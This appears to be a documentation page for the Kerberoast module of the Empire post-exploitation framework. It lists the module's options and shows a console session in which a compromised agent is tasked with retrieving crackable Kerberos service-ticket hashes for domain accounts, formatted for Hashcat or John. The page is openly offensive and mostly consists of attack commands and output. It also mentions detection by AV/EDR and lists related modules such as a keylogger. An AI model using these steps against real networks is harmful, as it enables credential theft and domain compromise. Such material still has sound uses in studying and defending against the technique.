Kerberoast - Empire Module
This page contains detailed information about how to use the csharp/SharpSploit.Enumeration/Kerberoast Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Kerberoast
Module: csharp/SharpSploit.Enumeration/Kerberoast
Source code:
empire/server/modules/csharp/SharpSploit.Enumeration.Covenant.yaml#L1305
Language: C#
Needs admin: No
OPSEC safe: No
Background: No
The Kerberoast module performs a "Kerberoast" attack that retrieves crackable service tickets for Domain User's w/ an SPN set.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the Kerberoast module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the Kerberoast module:
Agent
Agent to run module on.
DotNetVersion
.NET version to compile against.
Default value: Net35
.
Suggested values: Net35
, Net40
.
HashFormat
Format to output the hashes ("Hashcat" or "John").
Default value: Hashcat
.
Suggested values: Hashcat
, John
.
Usernames
Username(s) to port scan. Comma-delimited username list.
Default value: DOMAIN\username1,DOMAIN\username2
.
Kerberoast Example Usage
Here's an example of how to use the Kerberoast module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule csharp/SharpSploit.Enumeration/Kerberoast
Author cobbr_io
Background False
Description Perform a "Kerberoast" attack that retrieves crackable service tickets
for Domain User's w/ an SPN set.
Language csharp
Name csharp/SharpSploit.Enumeration/Kerberoast
NeedsAdmin False
OpsecSafe False
,Record Options-,-----------------------------------,----------,----------------------------------,
| Name | Value | Required | Description |
|---------------|-----------------------------------|----------|----------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|-----------------------------------|----------|----------------------------------|
| DotNetVersion | Net35 | True | .NET version to compile against |
|---------------|-----------------------------------|----------|----------------------------------|
| HashFormat | Hashcat | True | Format to output the hashes |
| | | | ("Hashcat" or "John"). |
|---------------|-----------------------------------|----------|----------------------------------|
| Usernames | DOMAIN\username1,DOMAIN\username2 | True | Username(s) to port scan. Comma- |
| | | | delimited username list. |
'---------------'-----------------------------------'----------'----------------------------------'
(Empire: usemodule/csharp/SharpSploit.Enumeration/Kerberoast) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/csharp/SharpSploit.Enumeration/Kerberoast) > set DotNetVersion Net35
[*] Set DotNetVersion to Net35
(Empire: usemodule/csharp/SharpSploit.Enumeration/Kerberoast) > set HashFormat Hashcat
[*] Set HashFormat to Hashcat
(Empire: usemodule/csharp/SharpSploit.Enumeration/Kerberoast) > set Usernames DOMAIN\username1,DOMAIN\username2
[*] Set Usernames to DOMAIN\username1,DOMAIN\username2
(Empire: usemodule/csharp/SharpSploit.Enumeration/Kerberoast) > execute
[!] Error: csharpserver plugin not running
Note: This module requires csharpserver plugin to be running on our system. If this plugin is not running, the error message "[!] Error: csharp server plugin not running
" is thrown on the console. To fix the error, start the csharpserver plugin and re-run the module:
(Empire: usemodule/csharp/SharpSploit.Enumeration/Kerberoast) > useplugin csharpserver
,Record Options--,----------,----------------------------------,
| Name | Value | Required | Description |
|--------|-------|----------|----------------------------------|
| status | start | True | Start/stop the Empire C# server. |
'--------'-------'----------'----------------------------------'
(Empire: useplugin/csharpserver) > execute
[*] Starting Empire C# server
(Empire: useplugin/csharpserver) > back
(Empire: usemodule/csharp/SharpSploit.Enumeration/Kerberoast) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
- cobbr_io
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/csharp/SharpSploit.Enumeration.Covenant.yaml#L1305
- https://twitter.com/cobbr_io
- https://twitter.com/checkymander
See Also
Check also the following modules related to this module:
- csharp/SharpSploit.Enumeration/GetNetSession
- csharp/SharpSploit.Enumeration/GetNetLoggedOnUser
- csharp/SharpSploit.Enumeration/GetNetLocalGroupMember
- csharp/SharpSploit.Enumeration/GetNetLocalGroup
- csharp/SharpSploit.Enumeration/GetDomainGroup
- csharp/SharpSploit.Enumeration/GetDomainUser
- csharp/SharpSploit.Enumeration/GetDomainComputer
- csharp/SharpSploit.Enumeration/Keylogger
- csharp/SharpSploit.Enumeration/PortScan
- csharp/SharpSploit.Enumeration/ListDirectory
- csharp/SharpSploit.Enumeration/ProcessList
- csharp/SharpSploit.Enumeration/SetRegistryKey
- csharp/SharpSploit.Enumeration/GetRegistryKey
- csharp/SharpSploit.Enumeration/SetRemoteRegistryKey
- csharp/SharpSploit.Enumeration/GetRemoteRegistryKey
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.